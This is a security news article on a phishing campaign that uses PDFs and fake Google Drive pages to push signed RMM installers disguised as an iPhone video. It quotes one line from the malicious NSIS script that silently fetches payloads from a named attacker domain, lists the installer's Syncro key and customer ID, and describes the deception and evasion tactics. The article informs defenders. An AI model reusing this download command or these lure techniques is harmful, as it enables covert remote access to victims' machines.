A concerning trend in cybersecurity has emerged with threat actors weaponizing PDF files to trick users into installing Remote Monitoring and Management (RMM) tools on their systems. These sophisticated attacks, which have been active since at least October 2025, leverage the legitimate functions of RMM software to gain unauthorized access to victim machines. The malicious PDF campaign exploits user trust, disguising itself within seemingly innocuous documents to deploy powerful remote access tools.
The attacks were identified by ASEC researchers, who found that threat actors are distributing RMM tools like Syncro, SuperOps, NinjaOne, and ConnectWise ScreenConnect through carefully crafted phishing campaigns. These campaigns often use email subjects with deceptive file names such as “Invoice,” “Product Order,” and “Payment,” aiming to capture the attention of business professionals and individuals. The ultimate goal is to establish a backdoor for persistent remote access, bypassing traditional security measures.
Threat Actors Leveraging RMM Tools Via Weaponized PDFs
The modus operandi involves users receiving a malicious PDF file. Upon opening, victims are presented with either a high-quality image that prevents immediate preview or a misleading “Failed to load PDF document” error message. Both scenarios are designed to prompt the user into clicking a link. This link then redirects them to fake Google Drive pages or fraudulent websites that impersonate trusted services like Adobe. These initial deception tactics are critical in luring victims into the next stage of the attack chain.
On the fake Google Drive page, the attackers present a file named “Video_recorded_on_iPhone17.mp4.” However, this is not a video file but an RMM installer disguised with a deceptive file name. The downloaded file often retains a naming convention like “Video_recorded_on_iPhone17.mp4 Drive.google.com” to further cement the illusion of legitimate video content. This social engineering tactic is crucial for getting users to execute the malicious payload.
ASEC researchers have tracked this campaign back to at least October 2025, as evidenced by the digital certificates used to sign the malicious installers. The threat actor behind this operation has been systematically distributing a variety of RMM tools, all signed with the same valid certificate. This strategy is employed to evade detection by security products, as RMM tools are not inherently classified as malware. Their legitimate administrative purpose allows them to fly under the radar of many security solutions.
Technical Breakdown of the Infection Mechanism
The infection process begins when a user is tricked into downloading what they believe is a video file. The executable file, downloaded from the compromised phishing site, is an installer created using tools like Advanced Installer or NSIS. Once executed on the target system, it silently deploys the intended RMM tool.
For installations targeting Syncro RMM, the malware utilizes specific parameters during execution. These include a “key” value of “yK0UAOaHHwdbYDOp_sr51w” and a “customerid” of “1709830.” These details enable the threat actor to identify and remotely control the compromised machines through the Syncro RMM platform’s legitimate infrastructure. This highlights how attackers are co-opting legitimate IT management tools for malicious ends.
A variant of the attack utilizing an NSIS-based downloader embeds scripts designed to fetch additional payloads from attacker-controlled servers. A malicious NSI script executes commands such as:
StrCpy $0 $TEMPtemp_response.html INetC::get/silent https://anhemvn124.com $0
This command silently downloads files from a malicious domain, preparing the system for further compromise. The installer then proceeds to deploy NinjaOne RMM using Windows Installer in quiet mode, ensuring minimal user detection during the installation process.
The exploitation of RMM tools presents a significant challenge for cybersecurity defenses. Because these tools are designed for legitimate remote network administration, firewalls and anti-malware programs often permit their activity. This creates a blind spot that attackers capitalize on to gain persistent remote access, effectively turning an IT support tool into a powerful weapon for data breaches and system compromise. The ongoing nature of this campaign suggests that organizations must remain vigilant and implement robust security measures to protect against these evolving threats.